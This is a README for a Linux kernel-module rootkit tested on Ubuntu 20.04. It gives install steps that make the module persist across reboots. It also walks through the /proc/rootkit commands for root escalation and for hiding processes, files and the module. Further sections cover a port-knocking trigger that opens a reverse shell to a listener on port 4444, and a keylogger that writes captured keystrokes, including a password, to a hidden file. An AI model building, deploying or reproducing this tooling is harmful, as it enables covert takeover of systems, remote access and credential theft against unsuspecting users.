A full-featured Linux 5.4 LKM Rootkit (Tested on Ubuntu 20.04)
In order to build, the following packages are required:
- build-essential
- linux-headers
sudo apt install build-essential linux-headers-$(uname -r)
Alternatively, a Vagrantfile is provided for Ubuntu 20.04 with dependencies installed here.
An installer script has been provided to help you get up and running, to use simply run the following
sudo ./installer.sh installThis will make and install the rootkit persistently, by dropping the compiled .ko into a folder in /lib/modules/ and adding it to /etc/modules
From here, the rootkit is now active. By default it is interfacable via a procfile located in /proc/rootkit and hidden from the user
In order to toggle all file/folder/process/module hiding, you can write toggle to the procfile interface
$ lsmod | grep rootkit
$ echo toggle > /proc/rootkit
$ lsmod | grep rootkit
rootkit 24576 0For any process to elevate to running with root permissions, all it has to do is write root into the procfile
$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
$ echo root > /proc/rootkit
$ id
uid=0(root) gid=0(root) groups=0(root)Writing hide<PID> to the procfile will hide that process and it's children from all other processes on the system, while it will remain visible to you.
Process 1
$ echo $$
86711
$ echo hide$$ > /proc/rootkit
$ ps aux | grep $$ # Process remains visible to self
vagrant 86711 0.0 0.0 9836 4232 pts/0 Ss 14:09 0:00 /bin/bashProcess 2
$ ps aux | grep 86711 # Process cannot be seen by others
$ echo toggle > /proc/rootkit
$ ps aux | grep 86711 # Can be seen when hiding is disabled
vagrant 86711 0.0 0.0 9836 4232 pts/0 Ss+ 14:09 0:00 /bin/bashThe opposite can be done using unhide
In order to trigger a reverse shell, you can knock on a series of ports: [5295, 9257, 7369]. Upon doing this, a reverse shell to your IP on port 4444 will be opened.
Listen for connection
$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.99.10.
Ncat: Connection from 192.168.99.10:49748.
root@vagrant:/#Knock ports example
$ knock 192.168.99.10 5295
$ knock 192.168.99.10 9257
$ knock 192.168.99.10 7369All keystrokes are logged to a file in /usr/rk_file_keylog - the file is named as such because any file with the prefix rk_file_ will be hidden from directory listing.
$ sudo tail -f /usr/rk_file_keylog
Starting keylogger
test_user
PaSsWoRd
<CTRL>c
<CTRL>z
<CAPSLOCK>AAAAAAA
<CAPSLOCK>calmThe following will unhide the module and remove it from the system
sudo ./installer.sh remove